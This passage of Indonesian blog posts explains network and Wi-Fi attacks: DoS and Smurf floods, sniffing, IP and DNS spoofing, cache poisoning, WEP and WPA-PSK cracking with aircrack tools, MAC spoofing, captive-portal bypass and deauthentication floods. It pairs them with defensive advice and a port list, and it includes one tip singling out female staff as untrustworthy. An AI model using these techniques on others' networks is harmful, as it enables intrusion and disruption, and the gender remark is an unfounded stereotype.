pengirim adalah valid dan akan menerima koneksi dari pengirim dengan normal.

Karena ada masalah dengan implementasi lapisan TCP/IP, metode ini kemungkinan

tidak kompatibel dengan beberapa sistem operasi. Metode ini merubah waktu peng-

alokasian memori, yang tadinya pada awal dari proses 'three-way-handshake', menjadi

diakhir dari proses tersebut.

Bentuk lain dari serangan DOS adalah 'Smurf Attack' yang mempergunakan paket ping request.

Dalam melakukan penyerangan, penyerang akan mengirimkan paket-paket ping request ke

banyak host dengan merubah alamat IP sumber menjadi alamat host yang akan diserang. Host-

host yang menerima paket ping request tersebut akan mengirimkan paket balasan ke alamat IP

host korban serangan. Untuk serangan dapat mengganggu sistem korban, host yang menjawab

paket ping request harus cukup banyak. Oleh karena itu, biasanya paket ping request akan

dikirimkan ke alamat broadcast dari sebuah kelompok jaringan komputer, sehingga host-host

pada kelompok jaringan komputer tersebut secara otomatis akan menjawab paket tersebut.

DOS juga dapat dilakukan dengan cara mengirimkan permintaan layanan yang diberikan oleh

sebuah host secara berlebihan atau terus menerus. Tujuan dari serangan model ini adalah untuk

membuat host menjadi terlalu sibuk atau kehabisan sumber daya komputasi sehingga tidak

dapat melayani permintaan-permintaan lainnya.

Perkembangan lanjutan dari DOS adalah DDOS, dimana host yang terlibat dalam serangan

lebih dari satu dan tersebar di banyak tempat. Banyaknya host yang terlibat dalam serangan

akan meningkatkan efek serangan dan mempersulit pihak yang diserang untuk mempertahankan

diri ataupun melakukan pelacakan asal serangan. Pada banyak kejadian, host-host yang terlibat

dalam serangan, tidak semuanya sadar bahwa mereka terlibat dalam sebuah serangan DDOS.

Host-host tersebut telah disusupi terlebih dahulu oleh penyerang, sehingga penyerang dapat

mempergunakan host tersebut untuk melakukan serangan. Penyusupan dapat dilakukan dengan

cara mengirimkan trojan atau worm ke banyak host.

– Packet Sniffing

Packet Sniffing adalah sebuah metode serangan dengan cara mendengarkan seluruh paket yang

lewat pada sebuah media komunikasi, baik itu media kabel maupun radio. Setelah paket-paket

yang lewat itu didapatkan, paket-paket tersebut kemudian disusun ulang sehingga data yang

dikirimkan oleh sebuah pihak dapat dicuri oleh pihak yang tidak berwenang.

Hal ini dapat dilakukan karena pada dasarnya semua koneksi ethernet adalah koneksi yang

bersifat broadcast, di mana semua host dalam sebuah kelompok jaringan akan menerima paket

yang dikirimkan oleh sebuah host. Pada keadaan normal, hanya host yang menjadi tujuan paket

yang akan memproses paket tersebut sedangkan host yang lainnya akan mengacuhkan paket-

paket tersebut. Namun pada keadaan tertentu, sebuah host bisa merubah konfigurasi sehingga

host tersebut akan memproses semua paket yang dikirimkan oleh host lainnya.

Cukup sulit untuk melindungi diri dari gangguan ini karena sifat dari packet sniffing yang

merupakan metode pasif (pihak penyerang tidak perlu melakukan apapun, hanya perlu

mendengar saja). Namun ada beberapa hal yang bisa dilakukan untuk mengatasi hal ini, yaitu:

 Secara rutin melakukan pemeriksaan apakah ada host di jaringan kita yang sedang

dalam mode promiscuous, yaitu sebuah mode dimana host tersebut akan memproses

semua paket yang diterima dari media fisik. Akan tetapi hal ini hanya akan melindungi

diri kita terhadap packet sniffer yang berada pada satu kelompok jaringan dengan kita.

Penyerang yang melakukan sniffing dari luar jaringan komputer kita tidak akan

terdeteksi dengan menggunakan metode ini.

 Mempergunakan SSL atau TLS dalam melakukan pengiriman data. Ini tidak akan

mencegah packet sniffer untuk mencuri paket yang dikirimkan, akan tetapi paket-paket

yang dicuri tidak bisa dipergunakan karena dikirimkan dengan menggunakan format

yang terenkripsi.

 Melakukan koneksi VPN, sehingga tetap bisa mempergunakan aplikasi yang tidak

mendukung SSL atau TLS dengan aman.

Packet Sniffing sebagai tools pengelola jaringan

Sebenarnya selain sebagai menjadi alat untuk melakukan kejahatan, packet sniffer juga bisa

digunakan sebagai alat pertahanan. Dengan melakukan analisa paket-paket yang melalui sebuah

media jaringan komputer, pengelola dapat mengetahui apabila ada sebuah host yang

mengirimkan paket-paket yang tidak normal, misalnya karena terinfeksi virus. Sebuah IDS juga

pada dasarnya adalah sebuah packet sniffer yang bertugas untuk mencari host yang

mengirimkan paket-paket yang berbahaya bagi keamanan. Selain itu packet sniffer juga bisa

menjadi alat untuk melakukan analisa permasalahan yang sedang dihadapi sebuah jaringan

komputer. Misalkan ketika sebuah host tidak dapat berhubungan dengan host lainnya yang

berada pada kelompok jaringan yang berbeda, maka dengan packet sniffer, pengelola jaringan

komputer dapat melakukan penelusuran dimana permasalahan koneksi itu terletak.

– IP Spoofing

IP Spoofing adalah sebuah model serangan yang bertujuan untuk menipu seseorang. Serangan

ini dilakukan dengan cara mengubah alamat asal sebuah paket, sehingga dapat melewati

perlindungan firewall dan menipu host penerima data. Hal ini dapat dilakukan karena pada

dasarnya alamat IP asal sebuah paket dituliskan oleh sistem operasi host yang mengirimkan

paket tersebut. Dengan melakukan raw-socket-programming, seseorang dapat menuliskan isi

paket yang akan dikirimkan setiap bit-nya sehingga untuk melakukan pemalsuan data dapat

dilakukan dengan mudah.

Salah satu bentuk serangan yang memanfaatkan metode IP Spoofing adalah 'man-in-the-middle-

attack'. Pada serangan ini, penyerang akan berperan sebagai orang ditengah antara dua pihak

yang sedang berkomunikasi. Misalkan ada dua pihak yaitu pihak A dan pihak B lalu ada

penyerang yaitu C. Setiap kali A mengirimkan data ke B, data tersebut akan dicegat oleh C, lalu

C akan mengirimkan data buatannya sendiri ke B, dengan menyamar sebagi A. Paket balasan

dari B ke A juga dicegat oleh C yang kemudian kembali mengirimkan data 'balasan' buatannya

sendiri ke A. Dengan cara ini, C akan mendapatkan seluruh data yang dikirimkan antara A dan

B, tanpa diketahui oleh A maupun C.

Untuk mengatasi serangan yang berdasarkan IP Spoofing, sebuah sistem operasi harus dapat

memberikan nomor-urut yang acak ketika menjawab inisiasi koneksi dari sebuah host. Dengan

nomor urut paket yang acak, akan sangat sulit bagi seorang penyerang untuk dapat melakukan

pembajakan transmisi data.

Selain itu, untuk mengatasi model serangan 'man-in-the-middle-attack', perlu ada sebuah

metode untuk melakukan otentikasi host yang kita hubungi. Otentikasi dapat berupa digital-

certificate yang eksklusif dimiliki oleh host tersebut.

Konfigurasi firewall yang tepat juga dapat meningkatkan kemampuan jaringan komputer dalam

menghadapi IP Spoofing. Firewall harus dibuat agar dapat menolak paket-paket dengan alamat

IP sumber jaringan internal yang masuk dari interface yang terhubung dengan jaringan

eksternal.

– DNS Forgery

Salah satu cara yang dapat dilakukan oleh seseorang untuk mencuri data-data penting orang lain

adalah dengan cara melakukan penipuan. Salah satu bentuk penipuan yang bisa dilakukan

adalah penipuan data-data DNS. DNS adalah sebuah sistem yang akan menterjemahkan nama

sebuah situs atau host menjadi alamat IP situs atau host tersebut. Cara kerja DNS cukup

sederhana, yaitu sebuah host mengirimkan paket (biasanya dengan tipe UDP) yang pada header

paket tersebut berisikan alamat host penanya, alamat DNS resolver, pertanyaan yang diinginkan

serta sebuah nomor identitas. DNS resolver akan mengirimkan paket jawaban yang sesuai ke

penanya. Pada paket jawaban tersebut terdapat nomor identitas, yang dapat dicocokkan oleh

penanya dengan nomor identitas yang dikirimnya. Oleh karena cara kerja yang sederhana dan

tidak adanya metode otentikasi dalam sistem komunikasi dengan paket UDP, maka sangat

memungkinkan seseorang untuk berpura-pura menjadi DNS resolver dan mengirimkan paket

jawaban palsu dengan nomor identitas yang sesuai ke penanya sebelum paket jawaban dari

DNS resolver resmi diterima oleh penanya. Dengan cara ini, seorang penyerang dapat dengan

mudah mengarahkan seorang pengguna untuk melakukan akses ke sebuah layanan palsu tanpa

diketahui pengguna tersebut. Sebagai contoh, seorang penyerang dapat mengarahkan seorang

pengguna Internet Banking untuk melakukan akses ke situs Internet Banking palsu yang

dibuatnya untuk mendapatkan data-data pribadi dan kartu kredit pengguna tersebut.

Untuk dapat melakukan gangguan dengan memalsukan data DNS, seseorang membutuhkan

informasi-informasi di bawah ini :

 Nomor identitas pertanyaan (16 bit)

 Port tujuan pertanyaan

 Alamat IP DNS resolver

 Informasi yang ditanyakan

 Waktu pertanyaan.

Pada beberapa implementasi sistem operasi, informasi diatas yang dibutuhkan seseorang untuk

melakukan penipuan data DNS bisa didapatkan. Kunci dari serangan tipe ini adalah, jawaban

yang diberikan DNS resolver palsu harus diterima oleh penanya sebelum jawaban yang

sebenarnya diterima, kecuali penyerang dapat memastikan bahwa penanya tidak akan menerima

jawaban yang sebenarnya dari DNS resolver yang resmi.

DNS Cache Poisoning

Bentuk lain serangan dengan menggunakan DNS adalah DNS Cache Poisoning. Serangan ini

memanfaatkan cache dari setiap server DNS yang merupakan tempat penyimpanan sementara

data-data domain yang bukan tanggung jawab server DNS tersebut. Sebagai contoh, sebuah

organisasi 'X' memiliki server DNS (ns.x.org) yang menyimpan data mengenai domain 'x.org'.

Setiap komputer pada organisasi 'X' akan bertanya pada server 'ns.x.org' setiap kali akan

melakukan akses Internet. Setiap kali server ns.x.org menerima pertanyaan diluar domain

'x.org', server tersebut akan bertanya pada pihak otoritas domain. Setelah mendapatkan jawaban

yang dibutuhkan, jawaban tersebut akan disimpan dalam cache, sehingga jika ada pertanyaan

yang sama, server 'ns.x.org' dapat langsung memberikan jawaban yang benar. Dengan tahapan-

tahapan tertentu, seorang penyerang dapat mengirimkan data-data palsu mengenai sebuah

domain yang kemudian akan disimpan di cache sebuah server DNS, sehingga apabila server

tersebut menerima pertanyaan mengenai domain tersebut, server akan memberikan jawaban

yang salah. Patut dicatat, bahwa dalam serangan ini, data asli server DNS tidak mengalami

perubahan sedikitpun. Perubahan data hanya terjadi pada cache server DNS tersebut.

Cara yang paling efektif dalam menghadapi serangan yang merubah DNS server adalah dengan

melakukan otentikasi host yang akan kita hubungi. Model otentikasi yang banyak digunakan

saat ini adalah dengan mempergunakan digital certificate. Dengan digital certificate, seseorang

dapat dengan yakin bahwa host yang dia akses adalah host yang sebenarnya

Kelemahan/Ancaman Jaringan Wifi (Wireless Fidelity)

noreply@blogger.com (ROCHIM-TECH) — Thu, 10 Nov 2011 09:24:00 +0000

Masalah keamanan merupakan hal yang sangat penting dalam jaringan komputer, terutama dalam jaringan wireless. Kehadiran berbagai vendor produk wireless yang menyajikan beragam produk dengan harga terjangkau turut andil menjadi pendorong maraknya penggunaan teknologi wireless. Teknologi wireless ini tidak hanya cocok untuk digunakan pada kantor ataupun pengguna bisnis. Pengguna rumahan juga bisa menggunakan teknologi ini untuk mempermudah konektivitas. Makalah ini lebih ditujukan untuk memberikan informasi mengenai ancaman serta cara cepat dan mudah untuk mengamankan jaringan wireless. Seperti sudah dibahas di awal, teknologi wireless memang relatif lebih rentan terhadap masalah keamanan. Sesuai namanya, teknologi wireless menggunakan gelombang radio sebagai sarana transmisi data. Proses pengamanan akan menjadi lebih sulit karena Anda tidak dapat melihat gelombang radio yang digunakan untuk transmisi data.
Kelemahan jaringan wireless secara umum dapat dibagi menjadi 2 jenis, yakni kelemahan pada konfigurasi dan kelemahan pada jenis enkripsi yang digunakan. Salah satu contoh penyebab kelemahan pada konfigurasi karena saat ini untuk membangun sebuah jaringan wireless cukup mudah. Banyak vendor yang menyediakan fasilitas yang memudahkan pengguna atau admin jaringan sehingga sering ditemukan wireless yang masih menggunakan konfigurasi wireless default bawaan vendor. Seringkali wireless yang dipasang pada jaringan masih menggunakan setting default bawaan vendor seperti SSID, IP Address, remote manajemen, DHCP enable, kanal frekuensi, tanpa enkripsi bahkan user/password untuk administrasi wireless tersebut masih standart bawaan pabrik.
WEP (Wired Equivalent Privacy) yang menjadi standart keamanan wireless sebelumnya, saat ini dapat dengan mudah dipecahkan dengan berbagai tools yang tersedia gratis di internet. WPA-PSK yang dianggap menjadi solusi menggantikan WEP, saat ini juga sudah dapat dipecahkan dengan metode dictionary attack secara offline.
Beberapa kelemahan pada jaringan wireless yang bisa digunakan attacker melakukan serangan antara lain:
1. Celah Keamanan
Banyak pengguna jaringan wireless tidak bisa membayangkan jenis bahaya apa yang sedang menghampiri mereka saat sedang berasosiasi dengan wireless access point (WAP), misalnya seperti sinyal WLAN dapat disusupi oleh hacker. Berikut ini dapat menjadi ancaman dalam jaringan wireless, di antaranya:
- Sniffing to Eavesdrop
Paket yang merupakan data seperti akses HTTP, email, dan Iain-Iain, yang dilewatkan oleh gelombang wireless dapat dengan mudah ditangkap dan dianalisis oleh attacker menggunakan aplikasi Packet Sniffer seperti Kismet.
- Denial of Service Attack
Serangan jenis ini dilakukan dengan membanjiri (flooding) jaringan sehingga sinyal wireless berbenturan dan menghasilkan paket-paket yang rusak.
- Man in the Middle Attack
Peningkatan keamanan dengan teknik enkripsi dan authentikasi masih dapat ditembus dengan cara mencari kelemahan operasi protokol jaringan tersebut. Salah satunya dengan mengeksploitasi Address Resolution Protocol (ARP) pada TCP/IP sehingga hacker yang cerdik dapat mengambil alih jaringan wireless tersebut.
- Rogue/Unauthorized Access Point
Rogue AP ini dapat dipasang oleh orang yang ingin menyebarkan/memancarkan lagi tranmisi wireless dengan cara ilegal/tanpa izin. Tujuannya, penyerang dapat menyusup ke jaringan melalui AP liar ini.
- Konfigurasi access point yang tidak benar
Kondisi ini sangat banyak terjadi karena kurangnya pemahaman dalam mengkonfigurasi sistem keamanan AP.
Kegiatan yang mengancam keamanan jaringan wireless di atas dilakukan dengan cara yang dikenal sebagai Warchalking, WarDriving, WarFlying, WarSpamming, atau WarSpying. Banyaknya access point/base station yang dibangun seiring dengan semakin murahnya biaya berlangganan koneksi Internet, menyebabkan kegiatan hacking tersebut sering diterapkan untuk mendapatkan akses Internet secara ilegal. Tentunya, tanpa perlu membayar.

2. Hide SSID
Banyak administrator menyembunyikan Services Set Id (SSID) jaringan wireless mereka dengan maksud agar hanya yang mengetahui SSID yang dapat terhubung ke jaringan mereka. Hal ini tidaklah benar, karena SSID sebenarnya tidak dapat disembuyikan secara sempurna. Pada saat saat tertentu atau khususnya saat client akan terhubung (assosiate) atau ketika akan memutuskan diri (deauthentication) dari sebuah jaringan wireless, maka client akan tetap mengirimkan SSID dalam bentuk plain text (meskipun menggunakan enkripsi), sehingga jika kita bermaksud menyadapnya, dapat dengan mudah menemukan informasi tersebut. Beberapa tools yang dapat digunakan untuk mendapatkan ssid yang di-hidden antara lain: kismet (kisMAC), ssid_jack (airjack), aircrack dan masih banyak lagi. Berikut meupakan aplikasi Kismet yang secang melakukan sniffing.

3. WEP
Teknologi Wired Equivalency Privacy atau WEP memang merupakan salah satu standar enkripsi yang paling banyak digunakan. Namun, teknik enkripsi WEP ini memiliki celah keamanan yang cukup mengganggu. Bisa dikatakan, celah keamanan ini sangat berbahaya. Tidak ada lagi data penting yang bisa lewat dengan aman. Semua data yang telah dienkripsi sekalipun akan bisa dipecahkan oleh para penyusup. Kelemahan WEP antara lain :

Masalah kunci yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.
WEP menggunakan kunci yang bersifat statis
Masalah Initialization Vector (IV) WEP
Masalah integritas pesan Cyclic Redundancy Check (CRC-32)

WEP terdiri dari dua tingkatan, yakni kunci 64 bit, dan 128 bit. Sebenarnya kunci rahasia pada kunci WEP 64 bit hanya 40 bit, sedang 24 bit merupakan Inisialisasi Vektor (IV). Demikian juga pada kunci WEP 128 bit, kunci rahasia terdiri dari 104 bit.
Pada dasarnya, setiap paket data yang dikirim dengan menggunakan enkripsi WEP terdiri dari Initialization Vector (IV) dan data yang terenkripsi berisi sebuah checksum (bagian untuk mengecek apakah ada perubahan pada data yang dikirimkan). Titik lemah WEP terletak pada IV yang panjangnya 24 bit. Sebuah algoritma biasanya digunakan untuk menghitung kode terenkripsi dari IV dan kunci WEP sebelum dikirim melalui WLAN. Penerima data akan merekonstruksi data dengan IV dan kunci WEP yang tentunya sudah ditentukan. Standar WEP sebenarnya menyarankan agar kode IV selalu berbeda untuk setiap paket data. Sayangnya, tidak semua produsen melakukan hal tersebut.
Pembuat standar WEP juga tidak menyebutkan bagaimana cara membuat IV. Pada umumnya digunakan random generator. Dengan digunakannya generator semacam ini, bisa dipastikan cepat atau lambat kode IV yang sama akan digunakan kembali. Para peneliti memperkirakan IV yang sama dipergunakan setiap 4.000-5.000 paket data. Setelah mengetahui prinsip dari WEP, penyusup hanya perlu menunggu digunakannya IV yang sama untuk kemudian menghitung kunci WEP dan selanjutnya masuk ke dalam jaringan. Pada tahap ini, penyusup bisa melakukan apa pun dalam jaringan wireless. Software untuk melakukan semua hal tersebut bisa didapatkan gratis di Internet. Dengan sedikit tambahan pengetahuan dan latihan, membuka enkripsi WEP dapat dilakukan dengan mudah. Dengan berbekal software tersebut, setiap orang bisa belajar menjadi penyusup.
Serangan diatas membutuhkan waktu dan packet yang cukup, untuk mempersingkat waktu, para hacker biasanya melakukan traffic injection. Traffic Injection yang sering dilakukan adalah dengan cara mengumpulkan packet ARP kemudian mengirimkan kembali ke access point. Hal ini mengakibatkan pengumpulan initial vektor lebih mudah dan cepat. Berbeda dengan serangan pertama dan kedua, untuk serangan traffic injection diperlukan spesifikasi alat dan aplikasi tertentu yang mulai jarang ditemui di toko-toko, mulai dari chipset, versi firmware, dan versi driver serta tidak jarang harus melakukan patching terhadap driver dan aplikasinya.
Aplikasi yang bisa digunakan untuk melakukan mengcapture paket yaitu Airodump. Berikut merupakan contoh aplikasi airodump yang sedang mengcaptute paket pada WLAN.

Setelah data yang dicapture mencukupi, dilakukan proses cracking untuk menemukan WEP key. Aplikasi yang bisa digunakan untuk melakukan menembus enkripsi WEP yaitu Aircrack. Berikut merupakan contoh aplikasi aircrak yang berhasil menemukan key WEP.

4. WPA-PSK atau WPA2-PSK
WPA merupakan teknologi keamanan sementara yang diciptakan untuk menggantikan kunci WEP. Ada dua jenis yakni WPA personal (WPA-PSK), dan WPA-RADIUS. Saat ini yang sudah dapat di crack adalah WPA-PSK, yakni dengan metode brute force attack secara offline. Brute force dengan menggunakan mencoba-coba banyak kata dari suatu kamus. Serangan ini akan berhasil jika passphrase yang digunakan wireless tersebut memang terdapat pada kamus kata yang digunakan si hacker. Untuk mencegah adanya serangan terhadap keamanan wireless menggunakan WPA-PSK, gunakanlah passphrase yang cukup panjang (satu kalimat).

5. MAC Filter
Hampir setiap wireless access point maupun router difasilitasi dengan keamanan MAC Filtering. Hal ini sebenarnya tidak banyak membantu dalam mengamankan komunikasi wireless, karena MAC address sangat mudah dispoofing atau bahkan dirubah. Tools ifconfig pada OS Linux/Unix atau beragam tools spt network utilitis, regedit, smac, machange pada OS windows dengan mudah digunakan untuk spoofing atau mengganti MAC address.
Masih sering ditemukan wifi di perkantoran dan bahkan ISP (yang biasanya digunakan oleh warnet-warnet) yang hanya menggunakan proteksi MAC Filtering. Dengan menggunakan aplikasi wardriving seperti kismet/kisMAC atau aircrack tools, dapat diperoleh informasi MAC address tiap client yang sedang terhubung ke sebuah Access Point. Setelah mendapatkan informasi tersebut, kita dapat terhubung ke Access point dengan mengubah MAC sesuai dengan client tadi. Pada jaringan wireless, duplikasi MAC address tidak mengakibatkan konflik. Hanya membutuhkan IP yang berbeda dengan client yang tadi.
Berikut merupakan daftar MAC address client yang terhubung ke sebuah access point dengan menggunakan tools kismet.
Untuk mengubah MAC address interface jaringan, cukup menggunakan tools sederhana seperti MAC MakeUp.

6. Captive Portal
Captive portal menjadi mekanisme populer bagi infrastruktur komunitas WiFi dan operator hotspot yang memberikan authentikasi bagi penguna infrastruktrur maupun manajemen flow IP, seperti, traffic shaping dan kontrol bandwidth, tanpa perlu menginstalasi aplikasi khusus di komputer pengguna. Proses authentication secara aman dapat dilakukan melalui sebuah web browser biasa di sisi pengguna. Captive portal juga mempunyai potensi untuk mengijinkan kita untuk melakukan berbagai hal secara aman melalui SSL & IPSec dan mengset rule quality of service (QoS) per user, tapi tetap mempertahankan jaringan yang sifatnya terbuka di infrastruktur WiFi.
Captive portal sebenarnya merupakan mesin router atau gateway yang memproteksi atau tidak mengizinkan adanya trafik hingga user melakukan registrasi/otentikasi. Berikut cara kerja captive portal :

User dengan wireless client diizinkan untuk terhubung wireless untuk mendapatkan IP address (DHCP)
Block semua trafik kecuali yang menuju ke captive portal (Registrasi/Otentikasi berbasis web) yang terletak pada jaringan kabel.
Redirect atau belokkan semua trafik web ke captive portal
Setelah user melakukan registrasi atau login, izinkan akses ke jaringan (internet)

Berikut contoh halaman login dari captive portal.

Beberapa hal yang perlu diperhatikan, bahwa captive portal hanya melakukan tracking koneksi client berdasarkan IP dan MAC address setelah melakukan otentikasi. Hal ini membuat captive portal masih dimungkinkan digunakan tanpa otentikasi karena IP dan MAC adress dapat di-spoofing. Serangan dilakukan dengan melakukan spoofing IP dan MAC. Spoofing MAC adress seperti yang sudah dijelaskan sebelumnya. Sedang untuk spoofing IP, diperlukan usaha yang lebih yakni dengan memanfaatkan ARP cache poisoning, dengan melakukan redirect trafik dari client yang sudah terhubung sebelumnya.
Serangan lain yang cukup mudah dilakukan adalah menggunakan Rogue AP, yaitu mengkonfigurasi Access Point yang menggunakan komponen informasi yang sama seperti AP target seperti SSID, BSSID hingga kanal frekwensi yang digunakan. Sehingga ketika ada client yang akan terhubung ke AP buatan kita, dapat kita membelokkan trafik ke AP sebenarnya.
Tidak jarang captive portal yang dibangun pada suatu hotspot memiliki kelemahan pada konfigurasi atau design jaringannya. Misalnya, otentikasi masih menggunakan plain text (http), managemen jaringan dapat diakses melalui wireless (berada pada satu network), dan masih banyak lagi. Kelemahan lain dari captive portal adalah bahwa komunikasi data atau trafik ketika sudah melakukan otentikasi (terhubung jaringan) akan dikirimkan masih belum terenkripsi, sehingga dengan mudah dapat disadap oleh para hacker. Untuk itu perlu berhati-hati melakukan koneksi pada jaringan hotspot, agar mengusahakan menggunakan komunikasi protokol yang aman seperti https,pop3s, ssh, imaps dst.
7. Wardrive
Wardrive adalah ekspedisi memancing elektronik untuk mencari jaringan wireless yang lemah. Kebanyakan, sebagian besar dari jaringan wireless tersebut bahkan tidak diberi password atau enkripsi untuk melindunginya. Kegiatan ini dilakukan untuk mencari jaringan mana saja yang akan dijadikan obyek serangan. Sehingga, kita bisa melakukan serangan terhadap jaringan wireless yang telah kita jadikan target. Untuk melakukan kegitan ini, hanya diperlukan peralatan sederhana. Kegiatan ini umumnya bertujuan untuk mendapatkan koneksi internet, tetapi banyak juga yang melakukan untuk maksud-maksud tertentu mulai dari rasa keingintahuan, coba coba, research, tugas praktikum, kejahatan dan lain lain.

Aplikasi untuk Site Survey/Wardrive “Netstumbler 0.4.0?
Langkah pertama dalam percobaan mengexploit suatu Wireless Network adalah menemukan Access Point. Tools yang bisa digunakan untuk melakukan hal ini yaitu NetStumbler. Tools ini sangan mudah digunakan untuk menemukan Signal dari Wireless Networking. Tools ini juga bisa mengukur kekuatan signal dan Noise yg dihasilkan karena banyaknya Connectivitas ke salah satu Access Point.
Hasil scanning dan analisa jaringan WLAN pada daerah kos-kosan sekitar IT Telkom menggunakan tools NetStumbler:

Grafik signal yang didapat menggunakan tools ini pada SSID “ittelkom”:

8. Kelemahan Protokol di Jaringan Wireless
Kelemahan-kelemahan dari jaringan wireless, sebenarnya tidak terlepas dari kelemahan berbagai macam protokol yang digunakannya, antara lain:
8.1 EAPOL (Extensible Authentication Protocol
EAPOL merupakan jenis protokol yang umum digunakan untuk authentikasi wireless dan point-to-point connection. Saatclient resmi mengirimkan paket ke AP. AP menerima dan memberikan responnya, atau AP telah melakukan proses otorisasi. Dari protokol EAPOL, terdapat celah yang dapat digunakan untuk memperoleh nilai authentikasi.
Namun, nilai authentikasi hanya terdapat saat awal terjadinya komunikasi client resmi dengan AP. Selanjutnya, bila sudah terhubung, protokol EAPOL tidak muncul lagi, kecuali saat 10 ribu paket berikutnya muncul. Seorang hacker dapat mengirim{injection) paket EAPOL hasil spoofing yang berisikan spoofing alamat SSID yang telah diselaraskan, MAC Address dan IP Address dari source/destination.
Client resmi mengirimkan paket EAPOL agar mendapat respon dari AP untuk proses autentikasi. Selanjutnya, AP akan memerika ID Card dari client. Attacker memanfaatkan kelemahan protokol tersebut dengan membuat ID Card palsu agar dibolehkan masuk oleh AP dan mendapatkan nomor untuk memasuki ruangan yang sama.
8.2 Manajemen Beacon
Manajemen Beacon merupakan salah satu jenis protokol yang digunakan setiap AP untuk memancarkan sinyal RF untuk mengabarkan keberadaan AP. Bila dilakukan capture protokol Beacon dan men-decode-kannya, akan diperoleh kenyataan bahwa dalam setiap transmision rate-nya, manajemen Beacon mengirimkan sejumlah informasi, seperti SSID, jenis enkripsi,channel, MAC Address, dan Iain-Iain.
Kelemahan (vulnerability) yang dapat dimanfaatkan dari jenis protokol ini adalah sebagai berikut. Sebuah attacker clientakan menangkap paket manajemen Beacon yang dipancarkan oleh AP. Selanjutnya, attacker client akan memancarkan kembali paket manajemen Beacon tersebut. Biasanya, nilai Beacon yang dipancarkan oleh AP sebesar 100ms. Bila attackerclient menangkap Beacon AP, lalu memancarkan Beacon tersebut kembali, akan ada 2 Beacon yang sama. Source pengirim berbeda, namun berisikan informasi yang sama. Ini artinya ada dua AP yang sama berisikan informasi SSID, MAC Address, yang sama. Akibatnya, seluruh client tidak dapat berkomunikasi dengan AP yang sebenarnya, kecuali attacker berhenti mengirim sejumlah paket Beacon tersebut.
8.3 Deauthentkation/Disassociation Protocol
Istilah yang biasa digunakan untuk memanfaatkan celah protokol ini disebut dengan Deauthentication Broadcast Attack.Serangan ini akan membanjiri WLAN dengan Deauthentication packet sehingga mengacaukan wireless service pada client. Serangan jenis ini merupakan serangan yang paling berbahaya karena akan memutus koneksi client target atau seluruhclient yang berasosiasi dengan AP Attacker melakukan permintaan pemutusan koneksi dengan memanfaatkan Deauthentication/Disassociation yang langsung direspon oleh AP. Seandainya ada sebuah perusahaan ISP yang terkena serangan ini, maka akan banyak keluhan dari pelanggan karena putusnya seluruh jaringan client.
Aplikasi yang bisa digunakan untuk serangan ini yaitu Aireplay. Berikut merupakan contoh kerja aplikasi Aircrak yang sedang melakukan Deauthentication Broadcast Attack.
8.4 Jamming Sinyal RF
Sinyal RF merupakan gelombang elektromagnetis yang dipergunakan untuk saling bertukar informasi melalui udara dari satu node ke node lainnya. Sekarang ini, sinyal RF sangat banyak digunakan, seperti untuk memancarkan gelombang radio FM, gelombang televisi atau sebagai sarana pengiriman data melalui jaringan nirkabel.
Sinyal RF memiliki kelebihan, namun juga memiliki kelemahan. Sinyal RF mudah terganggu oleh sistem yang berbasis RF eksternal lainnya, seperti cordless phone, microwave, perangkat Bluetooth, dan Iainnya. Saat perangkat tersebut digunakan secara bersamaan, kinerja jaringan nirkabel dapat menurun secara signifikan karena adanya persaingan dalam penggunaan medium yang sama. Pada akhirnya, gangguan tersebut dapat menyebabkan error pada bit-bit informasi yang sedang dikirim sehingga terjadi re-transmisi dan penundaan terhadap pengguna.
8.5 Manajemen Probe-Request
Saat client pertama kali berusaha untuk mengkoneksikan dirinya dengan AP, AP akan melakukan probe-respond untuk memeriksa apakah permintaan client untuk memasuki jaringan wireless tersebut diizinkan atau tidak. Celah yang dapat digunakan attacker adalah dengan melakukan manipulasi paket probe-respond. Selanjutnya, attacker melakukan permintaan probe-respond. Seandainya permintaan dilakukan dengan mengirimkan permintaan sebanyak-banyaknya, misalnya 500 paket dalam 1 detik, AP tidak akan mampu merespon paket yang begitu banyak. Artinya, AP tidak sanggup lagi berkomunikasi dengan client yang lain.

Cara Menjaga Sistem Keamanan Jaringan

noreply@blogger.com (ROCHIM-TECH) — Mon, 07 Nov 2011 04:59:00 +0000

Cara Menjaga Sistem Keamanan Jaringan ; Ancaman pembobolan ke dalam sistem jaringan tak hanya bersumber dari para peretas, orang dalam alias staf perusahaan itu sendiri pun bisa melakukannya.Tentu saja hal ini membutuhkan suatu kesigapan dari seorang admin untuk menjaga sistem keamanan jaringan perusahaan agar tidak dijebol.

Berikut 11 hal yang menurut penulis dapat menjadi perhatian khusus bagi para admin agar kehandalan sistem keamanan jaringan perusahaan di mana Anda bekerja tetap terjaga:

1. Mudah tertipu dan terlalu percaya kepada pengguna/user Anda, terutama para staf wanita atau sahabat yang meminta pertolongan.
2. Gedung dan pintu akses masuk/keluar yang tidak aman.
3. Dokumen-dokumen dan disk atau peripheral komputer yang belum dihancurkan atau tidak hancur pada saat sudah dibuang ke tempat sampah dapat dibaca oleh pihak lain.
4. Password yang lemah atau bahkan sistem jaringan tidak menggunakan password sama sekali.
5. Pertahanan jaringan yang kurang kuat karena mungkin tidak ada firewall dan sebagainya.
6. Akses kontrol yang lemah, missing file dan beberapa akses yang tidak seharusnya diberikan kepada user yang tidak perlu.
7. Sistem yang tidak dilakukan patch.
8. Otentikasi dan information disclosure aplikasi web tidak dilakukan sembarangan.
9. Sistem wireless berjalan dengan setting default dan tanpa WEP, WPA atau WPA2, sangat riskan dan mudah untuk dijebol.
10. SNMP melakukan enable jaringan host dalam keadaan default atau hanya menggunakan mode guest untuk komunitasnya sehingga sangat mudah untuk dijebol.
11. Menggunakan firewall, router, remote access dan peralatan dial up dalam keadaan default atau password guest atau menggunakan password yang terlalu mudah, karena ini sebagai jalan masuk hacker ke dalam sistem.

Di bawah ini beberapa port yang sangat sering dilakukan penetrasi (hacking) oleh para peretas dan staf yang nakal untuk mencoba-coba menjebol sistem keamanan jaringan:

* TCP port 20 dan 21 FTP (File Transfer Protocol)
* TCP port 23 Telnet (Terminal Emulation)
* TCP port 25 SMTP (Simple Mail Transfer Protocol)
* TCP dan UDP port 53 DNS (Domain Name System)
* TCP port 80 dan 443 HTTP dan HTTPs (Hypertext Transfer Protocol)
* TCP port 110 POP3 (Post Office Protocol version 3)
* TCP dan UDP port 135 RPC
* TCP dan UDP port 137 – 139 NetBIOS over TCP/IP
* TCP dan UDP port 161 SNMP (Simple Network Management Protocol)

